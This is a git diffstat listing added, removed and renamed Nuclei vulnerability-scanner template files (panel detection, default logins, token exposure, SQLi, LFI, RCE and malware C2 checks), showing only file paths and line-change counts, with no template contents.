.../Other/cnvd-2021-26422-1103.yaml | 4 - ...1-28277.yaml => cnvd-2021-28277-1105.yaml} | 0 .../Other/cnvd-2021-30167-1110.yaml | 44 + .../Other/cnvd-2021-30167-1112.yaml | 36 - .../Other/cnvd-2021-49104-1115.yaml | 38 - .../Other/cnzxsoft-default-login.yaml | 7 +- .../Other/cobalt-strike-c2-jarm.yaml | 5 +- 
nuclei-templates/Other/cobalt-strike-c2.yaml | 8 +- .../Other/cobbler-default-login-1121.yaml | 10 +- .../Other/cobbler-exposed-directories.yaml | 2 - .../Other/cobbler-exposed-directory.yaml | 6 +- .../Other/cobbler-version-detect.yaml | 18 +- nuclei-templates/Other/cobbler-version.yaml | 18 +- .../Other/cobbler-webgui-1123.yaml | 2 +- nuclei-templates/Other/coblocks.yaml | 2 +- .../Other/cockpit-detect-1127.yaml | 1 - ...rkflow-1129.yaml => cockpit-workflow.yaml} | 0 .../Other/code-climate-token.yaml | 4 +- nuclei-templates/Other/code-server-login.yaml | 18 +- nuclei-templates/Other/code-snippets.yaml | 2 +- .../Other/code42-log4j-rce-1131.yaml | 43 + nuclei-templates/Other/code42-log4j-rce.yaml | 35 - .../Other/codeception-config.yaml | 8 +- .../Other/codecov-access-token.yaml | 5 +- .../Other/codeigniter-env-1134.yaml | 34 + nuclei-templates/Other/codeigniter-env.yaml | 31 - .../Other/codeigniter-installer.yaml | 5 +- .../Other/codemeter-webadmin-panel.yaml | 14 +- .../Other/codemeter-webadmin.yaml | 5 +- .../Other/codepen-login-check.yaml | 5 +- nuclei-templates/Other/codian-mcu-login.yaml | 7 +- nuclei-templates/Other/codis-dashboard.yaml | 5 +- .../Other/cofense-vision-detection.yaml | 28 + .../Other/cofense-vision-panel.yaml | 27 - .../Other/coinbase-access-token.yaml | 5 +- ...1149.yaml => cold-fusion-cfcache-map.yaml} | 0 .../coldfusion-administrator-login-1146.yaml | 23 + .../Other/coldfusion-administrator-login.yaml | 23 - .../Other/coldfusion-debug-xss-1154.yaml | 31 + .../Other/coldfusion-debug-xss-1155.yaml | 30 - .../Other/collectd-exporter-metrics.yaml | 7 +- .../Other/collibra-properties.yaml | 14 +- .../Other/comai-ras-cookie-bypass.yaml | 6 +- .../Other/coming-soon-page-detect.yaml | 5 +- nuclei-templates/Other/coming-soon.yaml | 2 +- .../Other/command-api-explorer.yaml | 11 +- .../commax-credentials-disclosure-1160.yaml | 29 + .../Other/commax-credentials-disclosure.yaml | 30 - nuclei-templates/Other/compal-panel.yaml | 16 - 
nuclei-templates/Other/compal.yaml | 17 + .../Other/compalex-panel-detect.yaml | 6 +- .../Other/completeview-web-panel.yaml | 9 +- nuclei-templates/Other/complianz-gdpr.yaml | 4 +- .../Other/composer-auth-json.yaml | 6 +- .../Other/compromised-elasticsearch.yaml | 58 +- .../comtrend-password-exposure-1168.yaml | 27 - .../Other/comtrend-password-exposure.yaml | 23 + .../Other/concourse-ci-panel-1170.yaml | 24 - .../Other/concourse-ci-panel.yaml | 19 + .../Other/concrete-installer.yaml | 5 +- ...e-xss-1176.yaml => concrete-xss-1177.yaml} | 0 nuclei-templates/Other/config-json.yaml | 19 +- nuclei-templates/Other/config-properties.yaml | 4 +- ...2.yaml => configuration-listing-1184.yaml} | 0 .../Other/configure-aaa-service.yaml | 15 +- .../Other/configure-dns-server.yaml | 7 +- .../configure-service-timestamps-debug.yaml | 15 +- ...figure-service-timestamps-logmessages.yaml | 17 +- .../Other/configure-session-timeout.yaml | 7 +- .../Other/confluence-dashboard.yaml | 6 +- ...etect.yaml => confluence-detect-1186.yaml} | 0 .../Other/confluence-oauth-admin.yaml | 6 +- .../confluence-ssrf-sharelinks-1191.yaml | 31 + .../confluence-ssrf-sharelinks-1192.yaml | 21 - .../Other/confluent-access-token.yaml | 6 +- .../Other/confluent-secret-token.yaml | 6 +- nuclei-templates/Other/connect-box-login.yaml | 15 +- nuclei-templates/Other/connection_broker.yaml | 20 + .../Other/connectwise-backup-manager.yaml | 9 +- .../Other/connectwise-control-detect.yaml | 5 +- nuclei-templates/Other/connectwise-panel.yaml | 8 +- nuclei-templates/Other/contacam-1198.yaml | 3 +- .../Other/contact-form-7-honeypot.yaml | 2 +- .../Other/contact-form-7-plugin.yaml | 58 - nuclei-templates/Other/contact-form-7.yaml | 48 + .../Other/contact-form-cfdb7.yaml | 2 +- .../Other/contao-login-panel.yaml | 13 +- .../Other/content-central-login.yaml | 9 +- .../Other/contentful-api-token.yaml | 5 +- .../Other/contentify-installer.yaml | 5 +- .../Other/contentkeeper-detect-1201.yaml | 3 +- 
.../Other/control4-default-login.yaml | 8 +- .../Other/contus-video-gallery-sqli.yaml | 57 +- nuclei-templates/Other/cookie-injection.yaml | 34 - nuclei-templates/Other/cookie-law-info.yaml | 4 +- nuclei-templates/Other/cookie-notice.yaml | 2 +- .../Other/core-chuangtian-cloud-rce-1210.yaml | 45 - .../Other/core-chuangtian-cloud-rce-1212.yaml | 38 + nuclei-templates/Other/core-dump.yaml | 4 +- nuclei-templates/Other/corebos-htaccess.yaml | 5 +- nuclei-templates/Other/corebos-panel.yaml | 12 +- .../coremail-config-disclosure-1215.yaml | 23 + .../Other/coremail-config-disclosure.yaml | 28 - ...fig-1222.yaml => cors-misconfig-1221.yaml} | 0 .../Other/cortex-xsoar-login-1227.yaml | 23 - .../Other/cortex-xsoar-login-1229.yaml | 23 + ...i-1233.yaml => couchbase-buckets-api.yaml} | 0 .../Other/couchdb-adminparty-1234.yaml | 28 - .../Other/couchdb-adminparty-1237.yaml | 26 + nuclei-templates/Other/covenant-c2-jarm.yaml | 5 +- nuclei-templates/Other/covenant-c2-ssl.yaml | 6 +- nuclei-templates/Other/covenant-c2.yaml | 5 +- nuclei-templates/Other/cpanel-api-codes.yaml | 13 +- .../Other/cql-native-transport.yaml | 76 +- .../Other/craft-cms-detect-1247.yaml | 28 + nuclei-templates/Other/craft-cms-detect.yaml | 27 - ...el.yaml => craftcms-admin-panel-1245.yaml} | 0 nuclei-templates/Other/cratesio-api-key.yaml | 4 +- nuclei-templates/Other/crawlab-lfi.yaml | 4 +- .../Other/creame-whatsapp-me.yaml | 2 +- .../Other/creatio-login-panel.yaml | 9 +- .../creative-mail-by-constant-contact.yaml | 4 +- .../Other/credential-exposure-1250.yaml | 4149 +- nuclei-templates/Other/credentials-1257.yaml | 16 - .../Other/credentials-disclosure-1252.yaml | 712 - .../Other/credentials-disclosure-1255.yaml | 712 + nuclei-templates/Other/credentials-json.yaml | 6 +- nuclei-templates/Other/credentials.yaml | 13 + nuclei-templates/Other/crimson-malware.yaml | 4 +- .../Other/crlf-injection-1263.yaml | 49 +- nuclei-templates/Other/crmeb.yaml | 20 + nuclei-templates/Other/crontab-ui.yaml | 5 +- 
.../Other/cross-origin-embedder-policy.yaml | 2 +- .../Other/cross-origin-opener-policy.yaml | 7 +- .../Other/cross-origin-resource-policy.yaml | 4 +- nuclei-templates/Other/crossdomain-xml.yaml | 3 +- nuclei-templates/Other/crunchrat-malware.yaml | 8 +- .../Other/crush-ftp-detect-1271.yaml | 40 +- .../Other/crypto-mining-malware.yaml | 4 +- nuclei-templates/Other/cryptobox-panel.yaml | 5 +- .../Other/cryptxxx-dropper-malware.yaml | 6 +- nuclei-templates/Other/cryptxxx-malware.yaml | 6 +- .../Other/crystal-live-http-server-lfi.yaml | 2 +- .../Other/crystal-live-server-lfi.yaml | 6 +- .../cs-cart-unauthenticated-lfi-1285.yaml | 21 + .../Other/cs-cart-unauthenticated-lfi.yaml | 20 - .../Other/cs141-default-login-1280.yaml | 18 +- nuclei-templates/Other/cs141.yaml | 20 + .../{csod-panel.yaml => csod-panel-1286.yaml} | 0 .../Other/csrfguard-detect-1290.yaml | 72 + .../Other/csrfguard-detect-1291.yaml | 71 - .../Other/cucm-username-enumeration-1294.yaml | 8 +- nuclei-templates/Other/cudatel-panel.yaml | 9 +- nuclei-templates/Other/curcy-xss.yaml | 15 +- nuclei-templates/Other/custom-css-js.yaml | 2 +- .../custom-data-result-service-detect.yaml | 19 + .../custom-datadump-source-code-detect.yaml | 20 - nuclei-templates/Other/custom-fonts.yaml | 4 +- .../Other/custom-post-limits.yaml | 59 + .../Other/custom-post-type-ui.yaml | 2 +- .../Other/custom-solr-file-read.yaml | 50 - .../Other/custom-swagger-ui-detect.yaml | 68 - nuclei-templates/Other/custom-xss-check.yaml | 37 + nuclei-templates/Other/custom_nuclei-5.yaml | 44 - nuclei-templates/Other/custom_nuclei-8.yaml | 48 + .../Other/cvent-panel-detect.yaml | 9 +- nuclei-templates/Other/cvms-sqli.yaml | 10 +- nuclei-templates/Other/cxpid-malware.yaml | 5 +- .../Other/cyberoam-ssl-vpn-panel.yaml | 18 +- .../Other/cypress-web-config.yaml | 12 +- nuclei-templates/Other/cythosia-malware.yaml | 6 +- .../Other/d-link-arbitary-fileread-7044.yaml | 26 - .../Other/d-link-arbitary-fileread-7045.yaml | 21 + 
.../Other/d-link-wireless-7050.yaml | 23 - nuclei-templates/Other/d-link-wireless.yaml | 23 + nuclei-templates/Other/dahua-web-panel.yaml | 5 +- nuclei-templates/Other/darkrat-malware.yaml | 4 +- nuclei-templates/Other/darkstat-detect.yaml | 3 - .../Other/darktrace-threat-visualizer.yaml | 12 +- nuclei-templates/Other/dash-panel-detect.yaml | 8 +- nuclei-templates/Other/dashy-panel.yaml | 8 +- .../Other/data_science_studio.yaml | 20 + .../Other/database-credentials.yaml | 42 +- ...ror-6768.yaml => database-error-6771.yaml} | 0 .../Other/database.json-exposure.yaml | 2 +- .../Other/databricks-api-token.yaml | 5 +- .../Other/datadog-access-token.yaml | 5 +- .../Other/datadog-login-check.yaml | 4 +- nuclei-templates/Other/datadog-login.yaml | 9 +- nuclei-templates/Other/dataease-panel.yaml | 8 +- nuclei-templates/Other/dataease.yaml | 20 + .../Other/datahub-metadata-default-login.yaml | 5 +- nuclei-templates/Other/datahub.yaml | 20 + .../Other/dataiku-default-login.yaml | 5 +- nuclei-templates/Other/dataiku-panel.yaml | 9 +- nuclei-templates/Other/datasplice-panel.yaml | 2 - nuclei-templates/Other/davantis-panel.yaml | 9 +- .../Other/daybyday-detect-6772.yaml | 24 - nuclei-templates/Other/daybyday-detect.yaml | 24 + .../Other/db-backup-lfi-6776.yaml | 30 + nuclei-templates/Other/db-backup-lfi.yaml | 31 - nuclei-templates/Other/db-xml-file.yaml | 13 +- .../Other/dbeaver-credentials-6780.yaml | 12 +- .../Other/dbeaver-database-connections.yaml | 12 +- nuclei-templates/Other/dcrat-server-c2.yaml | 5 +- nuclei-templates/Other/ddostf-malware.yaml | 5 +- ...me.yaml => dead-host-with-cname-6787.yaml} | 0 .../Other/deadbolt-ransomware.yaml | 9 +- ...bled-6790.yaml => debug-enabled-6788.yaml} | 0 ...dedecms-carbuyaction-fileinclude-6793.yaml | 30 - ...dedecms-carbuyaction-fileinclude-6794.yaml | 24 + .../Other/dedecms-config-xss.yaml | 5 +- nuclei-templates/Other/dedecms-detect.yaml | 21 +- .../Other/dedecms-membergroup-sqli-6796.yaml | 26 + 
.../Other/dedecms-membergroup-sqli.yaml | 20 - ...02.yaml => dedecms-openredirect-6803.yaml} | 0 nuclei-templates/Other/dedecms-rce.yaml | 5 +- nuclei-templates/Other/deep-link-detect.yaml | 12 +- .../Other/defaced-website-detect.yaml | 5 +- ...yaml => default-apache-test-all-6814.yaml} | 0 .../Other/default-apache-test-page-6818.yaml | 19 + .../Other/default-apache-test-page.yaml | 17 - .../default-apache2-ubuntu-page-6809.yaml | 17 + .../Other/default-apache2-ubuntu-page.yaml | 18 - .../Other/default-asp-net-page-6822.yaml | 16 + .../Other/default-asp-net-page.yaml | 17 - .../Other/default-cakephp-page.yaml | 5 +- .../Other/default-centos-test-page.yaml | 5 +- .../Other/default-codeigniter-page-6833.yaml | 20 + .../Other/default-codeigniter-page.yaml | 23 - ...age.yaml => default-django-page-6842.yaml} | 0 ...ge.yaml => default-fastcgi-page-6845.yaml} | 0 .../Other/default-fedora-page-6848.yaml | 17 + .../Other/default-fedora-page-6850.yaml | 18 - .../default-glassfish-server-page-6854.yaml | 18 + .../Other/default-glassfish-server-page.yaml | 17 - .../Other/default-ibm-http-server-6857.yaml | 23 + .../Other/default-jetty-page-6863.yaml | 17 + .../Other/default-jetty-page.yaml | 18 - .../Other/default-lighttpd-page.yaml | 20 - .../default-lighttpd-placeholder-page.yaml | 5 +- .../Other/default-lucee-page-6871.yaml | 5 +- ...=> default-microsoft-azure-page-6873.yaml} | 0 .../Other/default-movable-page.yaml | 4 +- .../Other/default-nginx-page.yaml | 5 +- .../Other/default-openresty-6884.yaml | 17 + nuclei-templates/Other/default-openresty.yaml | 18 - .../default-oracle-application-page.yaml | 6 +- .../Other/default-page-azure-container.yaml | 5 +- .../Other/default-parallels-plesk.yaml | 5 +- ...l => default-payara-server-page-6895.yaml} | 0 .../Other/default-plesk-page-6900.yaml | 17 + .../Other/default-plesk-page.yaml | 18 - .../Other/default-redhat-test-page.yaml | 5 +- .../Other/default-runcloud-page.yaml | 5 +- .../Other/default-symfony-page.yaml | 7 +- 
.../Other/default-tengine-page.yaml | 7 +- .../Other/default-tomcat-page-6911.yaml | 18 + .../Other/default-websphere-liberty.yaml | 5 +- .../default-windows-server-page-6912.yaml | 17 + .../default-windows-server-page-6914.yaml | 18 - nuclei-templates/Other/deimos-c2-jarm.yaml | 5 +- nuclei-templates/Other/deimos-c2.yaml | 5 +- nuclei-templates/Other/delicate.yaml | 59 + .../Other/dell-bmc-panel-detect.yaml | 6 +- .../dell-emc-ecom-default-credentials.yaml | 26 + .../Other/dell-idrac-default-login-6946.yaml | 36 - .../Other/dell-idrac-default-login.yaml | 24 + nuclei-templates/Other/dell-idrac.yaml | 5 +- .../Other/dell-idrac6-detect-6918.yaml | 29 - .../Other/dell-idrac6-detect-6919.yaml | 25 + .../Other/dell-idrac7-detect-6923.yaml | 29 + .../Other/dell-idrac7-detect.yaml | 29 - .../Other/dell-idrac8-detect.yaml | 6 +- .../Other/dell-idrac9-default-login-6933.yaml | 37 + .../Other/dell-idrac9-default-login.yaml | 35 - .../Other/dell-idrac9-detect-6938.yaml | 30 + .../Other/dell-idrac9-detect-6939.yaml | 35 - .../Other/dell-openmanager-login-6948.yaml | 23 + .../Other/dell-openmanager-login.yaml | 26 - nuclei-templates/Other/dell-wyse-login.yaml | 7 +- ... 
=> dell-wyse-management-suite-login.yaml} | 0 nuclei-templates/Other/delta-login-panel.yaml | 7 +- .../Other/deluge-webui-panel.yaml | 14 +- .../Other/deos-open500-admin.yaml | 6 +- .../Other/deos-openview-admin.yaml | 8 +- .../Other/deprecated-sshv1-detection.yaml | 6 +- .../Other/deprecated-tls-6958.yaml | 20 - nuclei-templates/Other/deprecated-tls.yaml | 17 + .../Other/dericam-login-6962.yaml | 26 - nuclei-templates/Other/dericam-login.yaml | 22 + nuclei-templates/Other/derkziel-malware.yaml | 6 +- .../Other/desktop-ini-exposure.yaml | 5 +- ...l => detect-addpac-voip-gateway-6965.yaml} | 0 .../Other/detect-all-takeover.yaml | 183 - .../Other/detect-dangling-cname-6966.yaml | 32 - .../Other/detect-dangling-cname.yaml | 32 + ...s.yaml => detect-dns-over-https-6970.yaml} | 0 .../Other/detect-drone-config.yaml | 2 +- .../Other/detect-jabber-xmpp.yaml | 7 +- ...d.yaml => detect-options-method-6976.yaml} | 0 .../Other/detect-rsyncd-6979.yaml | 28 - .../Other/detect-rsyncd-6981.yaml | 27 + nuclei-templates/Other/detect-sentry.yaml | 11 +- nuclei-templates/Other/detect-ssl-issuer.yaml | 8 +- .../Other/detection-elasticsearch.yaml | 22 - .../Other/detection-zookeeper.yaml | 22 - ...t-logs.yaml => development-logs-6987.yaml} | 0 nuclei-templates/Other/deviantart.yaml | 33 +- nuclei-templates/Other/dexter-malware.yaml | 6 +- .../Other/diamondfox-malware.yaml | 6 +- ...fileread(1).yaml => diaowen-fileread.yaml} | 0 .../Other/diarise-theme-lfi-6992.yaml | 22 + nuclei-templates/Other/diarise-theme-lfi.yaml | 26 - .../Other/dicoogle-pacs-lfi-6993.yaml | 29 + .../Other/dicoogle-pacs-lfi-6995.yaml | 25 - .../Other/digital-ocean-ssrf.yaml | 7 +- ...nage-rce.yaml => digital-signage-rce.yaml} | 0 .../Other/digitalocean-access-token.yaml | 6 +- .../Other/digitalocean-personal-access.yaml | 6 +- .../Other/digitalocean-refresh-token.yaml | 6 +- .../Other/digitalrebar-default-login.yaml | 8 +- .../Other/digitalrebar-login.yaml | 18 +- .../digitalrebar-provision-default-login.yaml | 9 
+- .../Other/digitalrebar-provision-ui.yaml | 5 - .../Other/digitalrebar-traversal.yaml | 19 +- nuclei-templates/Other/dir-845l.yaml | 20 + .../Other/dir-850l-login-panel.yaml | 25 - nuclei-templates/Other/dir-listing-7006.yaml | 19 + nuclei-templates/Other/dir-listing.yaml | 20 - ...yaml => directadmin-login-panel-7000.yaml} | 0 .../Other/directory-traversal-7002.yaml | 78 +- nuclei-templates/Other/directum-login.yaml | 10 +- nuclei-templates/Other/directus-detect.yaml | 2 +- nuclei-templates/Other/disable-comments.yaml | 2 +- nuclei-templates/Other/disable-gutenberg.yaml | 2 +- .../Other/disable-ip-source-route.yaml | 14 +- .../Other/disable-pad-service.yaml | 13 +- nuclei-templates/Other/discord-api-token.yaml | 6 +- .../Other/discord-cilent-secret.yaml | 6 +- nuclei-templates/Other/discord-client-id.yaml | 6 +- .../Other/discourse-installer.yaml | 5 +- nuclei-templates/Other/discourse-xss.yaml | 6 +- ...ileRead.yaml => discuz-config-global.yaml} | 0 nuclei-templates/Other/discuz-panel.yaml | 7 +- ...aml => dixell-xweb500-filewrite-7019.yaml} | 0 .../Other/django-admin-panel-7021.yaml | 18 - .../Other/django-admin-panel-7023.yaml | 18 + ...ect.yaml => django-debug-detect-7024.yaml} | 0 ...e.yaml => django-debug-exposure-7029.yaml} | 0 ... 
=> django-framework-exceptions-7034.yaml} | 0 nuclei-templates/Other/django-secret-key.yaml | 31 - nuclei-templates/Other/django-secret.key.yaml | 62 + .../Other/django-variables-exposed.yaml | 11 +- ...35.yaml => dlink-850l-info-leak-7038.yaml} | 0 nuclei-templates/Other/dlink-netgear-xss.yaml | 15 +- nuclei-templates/Other/dmarc-detect.yaml | 17 +- nuclei-templates/Other/dns-320l.yaml | 20 + .../Other/dns-saas-service-detection.yaml | 7 +- .../Other/dns-waf-detect-7054.yaml | 6 + .../Other/docebo-elearning-panel.yaml | 9 +- nuclei-templates/Other/docker-cloud.yaml | 6 +- .../Other/docker-compose-config-7057.yaml | 27 + .../Other/docker-compose-config.yaml | 31 - .../Other/docker-hub-login-check.yaml | 5 +- .../Other/docker-registry-7064.yaml | 20 + .../Other/docker-registry-7067.yaml | 23 - nuclei-templates/Other/dockge-panel.yaml | 6 +- .../Other/docmosis-tornado-server.yaml | 5 +- .../Other/dokuwiki-installer.yaml | 5 +- nuclei-templates/Other/dokuwiki-panel.yaml | 4 +- ...ct-7069.yaml => dolibarr-detect-7071.yaml} | 0 .../Other/dolibarr-installer.yaml | 5 +- .../dolphinscheduler-default-login-7072.yaml | 48 + .../Other/dolphinscheduler-default-login.yaml | 47 - nuclei-templates/Other/dom-invaider.yaml | 43 - nuclei-templates/Other/dom-xss-7080.yaml | 54 + nuclei-templates/Other/dompdf-config.yaml | 5 +- .../Other/doorgets-info-disclosure.yaml | 5 +- nuclei-templates/Other/doppler-api-token.yaml | 5 +- nuclei-templates/Other/doris-panel.yaml | 4 +- nuclei-templates/Other/dos.yaml | 41 + nuclei-templates/Other/dotclear-detect.yaml | 22 + ...7085.yaml => dotcms-admin-panel-7087.yaml} | 0 .../Other/dotnet-remoting-service-detect.yaml | 17 +- .../Other/dotnetcms-sqli-7089.yaml | 36 - nuclei-templates/Other/dotnetcms-sqli.yaml | 25 + nuclei-templates/Other/dplus-dashboard.yaml | 9 +- .../Other/dqs-superadmin-panel.yaml | 9 +- nuclei-templates/Other/dradis-pro-panel.yaml | 9 +- .../Other/drawio-flowchartmaker-panel.yaml | 15 +- 
nuclei-templates/Other/drone-ci-panel.yaml | 17 +- .../Other/droneci-access-token.yaml | 5 +- .../Other/dropbear-cbc-ciphers.yaml | 14 +- nuclei-templates/Other/dropbear-weakalgo.yaml | 12 +- nuclei-templates/Other/dropbear-weakmac.yaml | 12 +- nuclei-templates/Other/dropbox-api-token.yaml | 6 +- .../Other/dropbox-longlived-token.yaml | 6 +- .../Other/dropbox-shortlived-token.yaml | 6 +- .../Other/druid-console-exposure.yaml | 3 - nuclei-templates/Other/druid-detect.yaml | 24 + ...itor-7103.yaml => druid-monitor-7100.yaml} | 0 nuclei-templates/Other/drupal-avatar-xss.yaml | 7 +- nuclei-templates/Other/drupal-detect.yaml | 14 +- ...-install.yaml => drupal-install-7106.yaml} | 0 .../Other/drupal-jsonapi-user-listing.yaml | 21 +- ...ml => drupal-user-enum-redirect-7115.yaml} | 0 .../{signatures-10262.yaml => drupal.yaml} | 0 ..._module-addtoany-cross-site-scripting.yaml | 34 +- ...l_module-context-cross-site-scripting.yaml | 18 +- ...ookie_compliance-cross-site-scripting.yaml | 11 +- ...al_module-facets-cross-site-scripting.yaml | 11 +- ...drupal_module-gutenberg-access-bypass.yaml | 10 +- ...le-opigno_learning_path-access-bypass.yaml | 19 +- ...ule-permissions_by_term-access-bypass.yaml | 88 +- .../drupal_module-s3fs-access-bypass.yaml | 32 +- ...rch_autocomplete-cross-site-scripting.yaml | 25 +- .../drupal_module-services-access-bypass.yaml | 8 +- nuclei-templates/Other/ds_store.yaml | 37 +- .../Other/dss-download-fileread-7116.yaml | 15 +- .../Other/dubbo-admin-default-login-7120.yaml | 46 - .../Other/dubbo-admin-default-login.yaml | 41 + nuclei-templates/Other/duffel-api-token.yaml | 5 +- nuclei-templates/Other/duplicate-page.yaml | 2 +- nuclei-templates/Other/duplicate-post.yaml | 2 +- nuclei-templates/Other/duplicator.yaml | 2 +- .../duracelltomi-google-tag-manager.yaml | 4 +- ...ogin.yaml => dvwa-default-login-7128.yaml} | 0 .../dvwa-headless-automatic-login-7131.yaml | 44 + .../Other/dvwa-headless-automatic-login.yaml | 43 - .../Other/dwr-921-login-panel.yaml 
| 30 + .../Other/dwr-index-detect-7135.yaml | 27 + nuclei-templates/Other/dwr-index-detect.yaml | 23 - ...xposure.yaml => dwsync-exposure-7138.yaml} | 0 nuclei-templates/Other/dxplanning-panel.yaml | 5 +- ...l => dynamic-broadcast-receiver-7142.yaml} | 0 ...-panel.yaml => dynamicweb-panel-7144.yaml} | 0 .../Other/dynamicweb-workflow.yaml | 5 +- nuclei-templates/Other/dynatrace-panel.yaml | 6 +- nuclei-templates/Other/dynatrace-token.yaml | 16 - .../Other/dzs-zoomsounds-listing-7148.yaml | 20 + .../Other/dzs-zoomsounds-listing.yaml | 25 - nuclei-templates/Other/dzzoffice-install.yaml | 20 +- nuclei-templates/Other/dzzoffice-panel.yaml | 10 +- nuclei-templates/Other/dzzoffice-xss.yaml | 5 +- nuclei-templates/Other/dzzoffice.yaml | 20 + nuclei-templates/Other/e-cology.yaml | 23 + ...-database.yaml => e-message-database.yaml} | 0 nuclei-templates/Other/e-mobile-panel.yaml | 14 +- nuclei-templates/Other/eMerge-panel.yaml | 14 +- nuclei-templates/Other/earcu-panel.yaml | 5 +- nuclei-templates/Other/easy-fancybox.yaml | 5 +- nuclei-templates/Other/easy-google-fonts.yaml | 6 +- .../easy-media-gallery-pro-listing-7150.yaml | 24 + .../Other/easy-media-gallery-pro-listing.yaml | 25 - .../Other/easy-table-of-contents.yaml | 2 +- .../Other/easy-wp-smtp-listing-7156.yaml | 19 + .../Other/easy-wp-smtp-listing.yaml | 21 - nuclei-templates/Other/easy-wp-smtp.yaml | 6 +- .../Other/easyimage-downphp-lfi.yaml | 4 +- nuclei-templates/Other/easyjob-panel.yaml | 6 +- .../Other/easypost-api-token.yaml | 6 +- .../Other/easypost-test-token.yaml | 6 +- .../Other/easyscripts-installer.yaml | 5 +- ...ery-restaurant-wp-theme-open-redirect.yaml | 3 - .../Other/ec2-detection-7162.yaml | 21 + nuclei-templates/Other/ec2-detection.yaml | 18 - .../Other/ec2-instance-information.yaml | 5 +- .../Other/eclipse-birt-panel.yaml | 8 +- .../ecoa-building-automation-lfd-7165.yaml | 27 - .../Other/ecoa-building-automation-lfd.yaml | 23 + .../ecology-arbitrary-file-upload-7169.yaml | 45 - 
.../Other/ecology-arbitrary-file-upload.yaml | 35 + nuclei-templates/Other/ecology-detect.yaml | 5 +- ...filedownload-directory-traversal-7172.yaml | 19 + ...logy-filedownload-directory-traversal.yaml | 20 - ...cology-oa-FileDownloadForOutDoc-sqli.yaml} | 0 .../Other/ecology-oa-byxml-xxe.yaml | 38 +- ...ingframework-directory-traversal-7175.yaml | 20 + ...y-springframework-directory-traversal.yaml | 21 - .../Other/ecology-syncuserinfo-sqli.yaml | 19 +- .../Other/ecology-v8-sqli-7179.yaml | 34 - nuclei-templates/Other/ecology-v8-sqli.yaml | 23 + .../Other/ecosys-command-center.yaml | 11 +- nuclei-templates/Other/ecshop-sqli.yaml | 3 - .../Other/ecsimagingpacs-rce.yaml | 9 +- nuclei-templates/Other/editor-exposure.yaml | 14 +- nuclei-templates/Other/efak-login-panel.yaml | 5 +- ...-7183.yaml => eg-manager-detect-7184.yaml} | 0 nuclei-templates/Other/eibiz-lfi-7186.yaml | 21 + nuclei-templates/Other/eibiz-lfi.yaml | 27 - .../Other/eibiz-server-3-8-0-lfi.yaml | 3 - .../Other/eko-management-console-login.yaml | 11 +- .../Other/eko-software-update-panel.yaml | 9 +- .../Other/elastic-hd-dashboard.yaml | 5 +- .../Other/elasticbeanstalk-takeover.yaml | 17 +- .../Other/elasticbeantalk-takeover.yaml | 6 - .../Other/elasticsearch-5-version.yaml | 5 - .../Other/elasticsearch-log4j.yaml | 11 +- .../elasticsearch-sql-client-detect-7190.yaml | 23 - .../elasticsearch-sql-client-detect.yaml | 23 + nuclei-templates/Other/elasticsearch.yaml | 29 + .../Other/elasticsearch5-log4j-rce.yaml | 26 +- ...yaml => electron-version-detect-7198.yaml} | 0 nuclei-templates/Other/elementor.yaml | 4 +- .../Other/elementorpage-open-redirect.yaml | 14 +- nuclei-templates/Other/elementskit-lite.yaml | 4 +- .../Other/elemiz-network-manager.yaml | 12 +- .../Other/elex-woocommerce-xss.yaml | 20 +- ...-detect.yaml => elfinder-detect-7202.yaml} | 0 ...l.yaml => elfinder-path-traversal(1).yaml} | 0 .../Other/elfinder-version-7205.yaml | 43 - nuclei-templates/Other/elfinder-version.yaml | 38 + 
nuclei-templates/Other/elfinder.yaml | 20 + .../Other/elmah-log-file-7207.yaml | 23 - nuclei-templates/Other/elmah-log-file.yaml | 18 + .../Other/email-extraction-7210.yaml | 22 + nuclei-templates/Other/email-extraction.yaml | 22 - .../Other/email-obfuscate-shortcode.yaml | 59 + nuclei-templates/Other/emby-panel.yaml | 13 +- .../Other/emcecom-default-login.yaml | 10 +- nuclei-templates/Other/emerge-workflow.yaml | 1 - .../Other/emerson-power-panel-7215.yaml | 25 - .../Other/emerson-power-panel.yaml | 21 + nuclei-templates/Other/empire-c2.yaml | 7 +- .../Other/empirec2-default-login.yaml | 43 +- nuclei-templates/Other/empirecms-detect.yaml | 5 +- .../Other/empirecms-xss-7220.yaml | 25 + nuclei-templates/Other/empirecms-xss.yaml | 20 - .../Other/emqx-default-login-7222.yaml | 39 + .../Other/emqx-default-login.yaml | 35 - nuclei-templates/Other/emqx-detect.yaml | 6 +- nuclei-templates/Other/emqx-detection.yaml | 3 - nuclei-templates/Other/emqx-panel.yaml | 4 +- nuclei-templates/Other/ems-sqli.yaml | 10 +- .../Other/enable-https-protocol.yaml | 7 +- .../Other/enable-media-replace.yaml | 2 +- ... 
enable-secret-for-user-and-password.yaml} | 0 .../Other/encompass-cm1-homepage.yaml | 7 +- .../Other/endpoint_protection_manager.yaml | 20 + .../Other/env-example-file-disclosure.yaml | 2 +- nuclei-templates/Other/envato-elements.yaml | 2 +- nuclei-templates/Other/environment-rb.yaml | 6 +- nuclei-templates/Other/envision-gateway.yaml | 3 - .../Other/envoy-admin-exposure.yaml | 5 +- nuclei-templates/Other/eos-http-browser.yaml | 5 +- nuclei-templates/Other/episerver-panel.yaml | 12 +- nuclei-templates/Other/epmp-login-7231.yaml | 21 + nuclei-templates/Other/epmp-login.yaml | 24 - nuclei-templates/Other/epp-server-lfi.yaml | 4 +- .../Other/epson-access-detect.yaml | 66 +- .../Other/epson-projector-detect.yaml | 52 +- .../Other/epson-web-control-detect-7239.yaml | 22 + .../Other/epson-web-control-detect.yaml | 25 - nuclei-templates/Other/erensoft-sqli.yaml | 14 +- nuclei-templates/Other/eris-xss.yaml | 8 +- nuclei-templates/Other/erlang-daemon.yaml | 17 +- .../Other/erp-nc-directory-traversal.yaml | 9 +- .../Other/error-based-sql-injection.yaml | 33 - nuclei-templates/Other/error-based.yaml | 32 + nuclei-templates/Other/erxes-detect.yaml | 5 +- .../Other/eset-protect-panel.yaml | 4 +- nuclei-templates/Other/eshop-installer.yaml | 5 +- nuclei-templates/Other/esmtp-detect.yaml | 65 +- .../Other/esmtprc-config-7260.yaml | 28 + nuclei-templates/Other/esmtprc-config.yaml | 31 - nuclei-templates/Other/espeasy-installer.yaml | 6 +- .../Other/espeasy-mega-exposure.yaml | 5 +- nuclei-templates/Other/esphome-dashboard.yaml | 5 +- nuclei-templates/Other/esphome-panel.yaml | 12 +- .../essential-addons-for-elementor-lite.yaml | 4 +- nuclei-templates/Other/esxi-system.yaml | 13 +- nuclei-templates/Other/etcd-keys-7261.yaml | 26 + nuclei-templates/Other/etcd-keys-7262.yaml | 25 - .../Other/etcd-unauthenticated-api.yaml | 2 - 